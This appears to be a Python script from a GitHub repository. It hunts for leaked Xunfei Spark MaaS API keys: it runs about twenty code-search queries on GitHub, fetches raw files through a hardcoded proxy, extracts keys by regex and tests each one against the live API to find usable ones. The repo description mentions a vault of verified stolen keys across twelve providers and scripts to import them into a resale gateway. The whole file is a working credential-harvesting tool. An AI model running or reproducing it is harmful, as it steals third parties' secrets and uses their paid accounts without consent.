- tools/scripts/llm-key-hunter: GitHub leak hunting pipeline (hunt_*, pivot miner, two-layer verify/content caches, per-provider verification) - usable_keys: verified key vault across 12 providers (deepseek, minimax, volcanoark, longcat, codingplan, zhipu free-tier, mimo, siliconflow, etc.) - .grok/skills/llm-key-hunter: operator skill for the hunt/verify/vault flow - NewAPI channel import scripts and CDP capture helpers - Result verdict buckets (excluding multi-GB blob caches and dedup dumps)
275 lines
11 KiB
Python
275 lines
11 KiB
Python
#!/usr/bin/env python3
|
|
"""Xunfei Spark MaaS coding API hunter.
|
|
|
|
Endpoint: https://maas-coding-api.cn-huabei-1.xf-yun.com
|
|
Key format: <32hex>:<secret> (Bearer auth)
|
|
Ports: /v2 (OpenAI compat), /anthropic (Anthropic compat), /v1/responses.
|
|
|
|
Classification: only HTTP 401/invalid => DEAD. Model-exists but unauthorized
|
|
(11200 AppIdNoAuthError) and 10404 are NOT dead - the key authenticates.
|
|
Outputs results/xunfei/.
|
|
"""
|
|
import argparse, json, os, re, subprocess, sys, time
|
|
import urllib.request, urllib.error, urllib.parse
|
|
from concurrent.futures import ThreadPoolExecutor, as_completed
|
|
from pathlib import Path
|
|
from verify_cache import CachedVerifier
|
|
from content_cache import ContentCache, parse_raw_url
|
|
|
|
HERE = Path(__file__).parent
|
|
RESULTS = HERE/"results"/"xunfei"; RESULTS.mkdir(parents=True, exist_ok=True)
|
|
EXTRACTED = RESULTS/"extracted_keys.txt"
|
|
CANDIDATES = RESULTS/"candidates.txt"
|
|
|
|
BASE = "https://maas-coding-api.cn-huabei-1.xf-yun.com"
|
|
GH_PROXY = os.environ.get("GH_PROXY","http://114.111.19.228:3389")
|
|
UA = "curl/8.5.0"
|
|
|
|
_gh=None
|
|
def gh_opener():
|
|
global _gh
|
|
if _gh is None:
|
|
_gh = urllib.request.build_opener(urllib.request.ProxyHandler({"http":GH_PROXY,"https":GH_PROXY})) if GH_PROXY else urllib.request.build_opener()
|
|
return _gh
|
|
_di=None
|
|
def direct():
|
|
global _di
|
|
if _di is None: _di=urllib.request.build_opener(urllib.request.ProxyHandler({}))
|
|
return _di
|
|
|
|
# key: 32 hex colon then 16+ alnum secret (base64-ish). Secret seen: 24 chars hex-lower.
|
|
KEY_RE = re.compile(r"\b([0-9a-f]{32}:[A-Za-z0-9]{16,80})\b")
|
|
DOMAIN = "maas-coding-api.cn-huabei-1.xf-yun.com"
|
|
|
|
SEARCH_QUERIES = [
|
|
f'"{DOMAIN}"',
|
|
f'"{DOMAIN}/v2"',
|
|
f'"{DOMAIN}/anthropic"',
|
|
'"xf-yun.com" "api_key"',
|
|
'"xf-yun.com" "Bearer"',
|
|
'"maas-coding-api" sk-',
|
|
'"maas-coding-api" "api_key"',
|
|
'"maas-coding-api" extension:py',
|
|
'"maas-coding-api" extension:js',
|
|
'"maas-coding-api" extension:ts',
|
|
'"maas-coding-api" extension:json',
|
|
'"maas-coding-api" extension:yaml',
|
|
'"maas-coding-api" extension:env',
|
|
'"maas-coding-api" filename:.env',
|
|
'"xdeepseekv3"',
|
|
'"xdeepseekr1"',
|
|
'"XUNFEI_API_KEY" extension:env',
|
|
'"SPARK_API_KEY" extension:env',
|
|
'"XFYUN_API_KEY" extension:env',
|
|
'"xunfei" "api_key" "xf-yun"',
|
|
'"cn-huabei-1.xf-yun.com"',
|
|
'"maas-coding-api.cn-huabei-1"',
|
|
]
|
|
|
|
def github_token():
|
|
t=os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN")
|
|
if t: return t
|
|
try:
|
|
o=subprocess.run(["gh","auth","token"],capture_output=True,text=True,timeout=10)
|
|
if o.returncode==0: return o.stdout.strip()
|
|
except FileNotFoundError: pass
|
|
h=Path.home()/".config"/"gh"/"hosts.yml"
|
|
if h.exists():
|
|
for ln in h.read_text().splitlines():
|
|
ln=ln.strip()
|
|
if ln.startswith("oauth_token:"): return ln.split(":",1)[1].strip()
|
|
return None
|
|
|
|
def gh_api(url,token):
|
|
hd={"Accept":"application/vnd.github+json","User-Agent":"key-hunter"}
|
|
if token: hd["Authorization"]=f"Bearer {token}"
|
|
req=urllib.request.Request(url,headers=hd)
|
|
for _ in range(6):
|
|
try:
|
|
with gh_opener().open(req,timeout=30) as r: return json.loads(r.read())
|
|
except urllib.error.HTTPError as e:
|
|
if e.code in (403,429):
|
|
rs=e.headers.get("X-RateLimit-Reset"); w=max(int(rs)-int(time.time()),5) if rs else 30
|
|
print(f" rate-limited {w}s",file=sys.stderr); time.sleep(w+1); continue
|
|
if e.code==422: return None
|
|
e.read(); return None
|
|
except Exception as e:
|
|
print(f" net {e}",file=sys.stderr); time.sleep(3)
|
|
return None
|
|
|
|
def gh_search(q,token,pp=100,pages=10):
|
|
for page in range(1,pages+1):
|
|
d=gh_api(f"https://api.github.com/search/code?q={urllib.parse.quote(q)}&per_page={pp}&page={page}",token)
|
|
if not d: return
|
|
items=d.get("items",[])
|
|
if not items: return
|
|
for it in items: yield it
|
|
if len(items)<pp: return
|
|
time.sleep(2.2 if token else 7)
|
|
|
|
def to_raw(u): return u.replace("github.com","raw.githubusercontent.com").replace("/blob/","/")
|
|
|
|
def fetch_raw(url):
|
|
req=urllib.request.Request(url,headers={"User-Agent":"Mozilla/5.0"})
|
|
try:
|
|
with gh_opener().open(req,timeout=20) as r: return r.read().decode("utf-8","replace")
|
|
except Exception: return ""
|
|
|
|
def make_cached_fetch(cc, fetcher=fetch_raw):
|
|
def cached(url):
|
|
repo, sha, path = parse_raw_url(url)
|
|
if repo and sha and path:
|
|
txt = cc.get(repo, path, sha)
|
|
if txt is not None:
|
|
return txt
|
|
txt = fetcher(url)
|
|
if txt:
|
|
cc.put(repo, path, sha, txt)
|
|
return txt
|
|
return fetcher(url)
|
|
return cached
|
|
|
|
def http(method,path,key,body=None,timeout=25):
|
|
h={"User-Agent":UA,"Authorization":f"Bearer {key}","Accept":"*/*"}
|
|
data=None
|
|
if body is not None:
|
|
data=json.dumps(body).encode(); h["Content-Type"]="application/json"
|
|
req=urllib.request.Request(BASE+path,data=data,headers=h,method=method)
|
|
try:
|
|
with direct().open(req,timeout=timeout) as r: return r.getcode(),r.read().decode("utf-8","replace")
|
|
except urllib.error.HTTPError as e:
|
|
try: return e.code,e.read().decode("utf-8","replace")
|
|
except Exception: return e.code,""
|
|
except Exception as e:
|
|
return 0,f"network: {type(e).__name__}: {e}"
|
|
|
|
def verify(key):
|
|
# 1) models list - cheapest auth check
|
|
code,body=http("GET","/v2/models",key)
|
|
bl=(body or "").lower()
|
|
if code==200:
|
|
# authenticated. try the coding models to see grant/balance
|
|
last=""
|
|
for model in ("auto","xopkimik26"):
|
|
c2,b2=http("POST","/v2/chat/completions",key,body={
|
|
"model":model,"max_tokens":1,
|
|
"messages":[{"role":"user","content":"hi"}]})
|
|
b2l=(b2 or "").lower(); last=f"[{model}] {c2}: {b2[:120]}"
|
|
if c2==200 and ('"choices"' in b2l or '"id"' in b2l):
|
|
return "USABLE",f"chat 200 OK ({model})"
|
|
if c2==402:
|
|
return "NO_BALANCE",f"[{model}] {b2[:140]}"
|
|
if "balance" in b2l or "arrearage" in b2l or "insufficient" in b2l or "quota" in b2l:
|
|
return "NO_BALANCE",f"[{model}] {b2[:140]}"
|
|
if c2==401:
|
|
return "DEAD","401"
|
|
# both models failed with non-401 - key authenticates but not entitled / no model access
|
|
if last:
|
|
return "NO_ACCESS",f"auth OK (models 200), {last}"
|
|
return "UNKNOWN",body[:160]
|
|
if code==401:
|
|
return "DEAD","401 unauthorized"
|
|
if code==0:
|
|
return "UNKNOWN",body[:160]
|
|
if "unauthorized" in bl or ("invalid" in bl and "api key" in bl):
|
|
return "DEAD",body[:140]
|
|
return "NO_ACCESS",f"models HTTP {code}: {body[:140]}"
|
|
|
|
def valid(k):
|
|
m=KEY_RE.fullmatch(k)
|
|
if not m: return False
|
|
sec=k.split(":",1)[1]
|
|
# reject obvious placeholders
|
|
return not any(x in k.lower() for x in ("your_","example","placeholder","xxxx","00000000000000000000000000000000"))
|
|
|
|
def main():
|
|
ap=argparse.ArgumentParser()
|
|
ap.add_argument("--verify-only",action="store_true")
|
|
ap.add_argument("--workers",type=int,default=20)
|
|
ap.add_argument("--resume",action="store_true")
|
|
ap.add_argument("--no-cache",action="store_true",help="ignore verification cache")
|
|
ap.add_argument("--no-content-cache",action="store_true",
|
|
help="ignore raw file content cache (always re-crawl)")
|
|
args=ap.parse_args()
|
|
|
|
keys={}
|
|
candidates={}
|
|
if args.resume and CANDIDATES.exists():
|
|
for ln in CANDIDATES.read_text().splitlines():
|
|
if "|" in ln:
|
|
u,r=ln.split("|",1); candidates[u]=r
|
|
print(f"resumed {len(candidates)} candidates")
|
|
|
|
if not args.verify_only:
|
|
token=github_token(); print(f"GitHub token: {'yes' if token else 'NO'}\n")
|
|
print("=== Stage 1: search ===")
|
|
for i,q in enumerate(SEARCH_QUERIES,1):
|
|
print(f" [{i:2d}/{len(SEARCH_QUERIES)}] {q}")
|
|
try:
|
|
for it in gh_search(q,token):
|
|
u=it.get("html_url","")
|
|
if u and u not in candidates:
|
|
candidates[u]=it.get("repository",{}).get("full_name","?")
|
|
except Exception as e:
|
|
print(f" err {e}",file=sys.stderr)
|
|
if i%5==0:
|
|
CANDIDATES.write_text("\n".join(f"{u}|{r}" for u,r in candidates.items()))
|
|
CANDIDATES.write_text("\n".join(f"{u}|{r}" for u,r in candidates.items()))
|
|
print(f" candidates: {len(candidates)}")
|
|
|
|
print("\n=== Stage 2: fetch & extract ===")
|
|
done=new=0
|
|
with ContentCache(force=getattr(args,"no_content_cache",False)) as cc:
|
|
cfetch = make_cached_fetch(cc)
|
|
with ThreadPoolExecutor(max_workers=20) as pool:
|
|
futs={pool.submit(cfetch,to_raw(u)):u for u in candidates}
|
|
for fut in as_completed(futs):
|
|
u=futs[fut]; done+=1
|
|
try: c=fut.result()
|
|
except Exception: c=""
|
|
for k in KEY_RE.findall(c or ""):
|
|
if valid(k) and k not in keys:
|
|
keys[k]=u; new+=1
|
|
if done%200==0:
|
|
print(f" {done}/{len(candidates)} keys={len(keys)} new={new} "
|
|
f"cache={cc.hits}hit/{cc.misses}fetch")
|
|
EXTRACTED.write_text("\n".join(f"{k}|{s}" for k,s in sorted(keys.items())))
|
|
st=cc.stats()
|
|
print(f" content cache: {st['hits']} hits, {st['misses']} fetched")
|
|
EXTRACTED.write_text("\n".join(f"{k}|{s}" for k,s in sorted(keys.items())))
|
|
print(f" extracted: {len(keys)} ({new} new)")
|
|
|
|
if args.verify_only and EXTRACTED.exists():
|
|
for ln in EXTRACTED.read_text().splitlines():
|
|
p=ln.split("|",1)
|
|
if p and valid(p[0]): keys.setdefault(p[0],p[1] if len(p)>1 else "?")
|
|
|
|
print(f"\n=== Stage 3: verify {len(keys)} keys ===")
|
|
B={"USABLE":[],"NO_BALANCE":[],"NO_ACCESS":[],"UNKNOWN":[],"DEAD":[]}
|
|
done=0; st=time.time()
|
|
with CachedVerifier("xunfei", verify, force=args.no_cache) as ver:
|
|
with ThreadPoolExecutor(max_workers=args.workers) as pool:
|
|
futs={pool.submit(ver,k):(k,s) for k,s in keys.items()}
|
|
for fut in as_completed(futs):
|
|
k,s=futs[fut]; done+=1
|
|
try: v,d=fut.result()
|
|
except Exception as e: v,d="UNKNOWN",f"exc {e}"
|
|
B[v].append((k,s,d))
|
|
if done%50==0:
|
|
el=time.time()-st
|
|
print(f" [{done:5d}/{len(keys)}] use={len(B['USABLE'])} nobal={len(B['NO_BALANCE'])} noacc={len(B['NO_ACCESS'])} unk={len(B['UNKNOWN'])} dead={len(B['DEAD'])} ({done/el:.1f}/s)")
|
|
cs=ver.stats()
|
|
print(f" cache: {cs['hits']} hits, {cs['live']} live queries")
|
|
print(f"\nDone in {time.time()-st:.1f}s")
|
|
for n in ("USABLE","NO_BALANCE","NO_ACCESS","UNKNOWN","DEAD"):
|
|
p=RESULTS/f"{n.lower()}.txt"
|
|
p.write_text("\n".join(f"{k}|{s}|{d}" for k,s,d in sorted(B[n])))
|
|
print(f" {n:11s}: {len(B[n]):5d}")
|
|
if B["USABLE"]:
|
|
print("\n=== USABLE ===")
|
|
for k,s,d in sorted(B["USABLE"]):
|
|
print(f" {k}\n {s}\n {d}")
|
|
|
|
if __name__=="__main__":
|
|
main()
|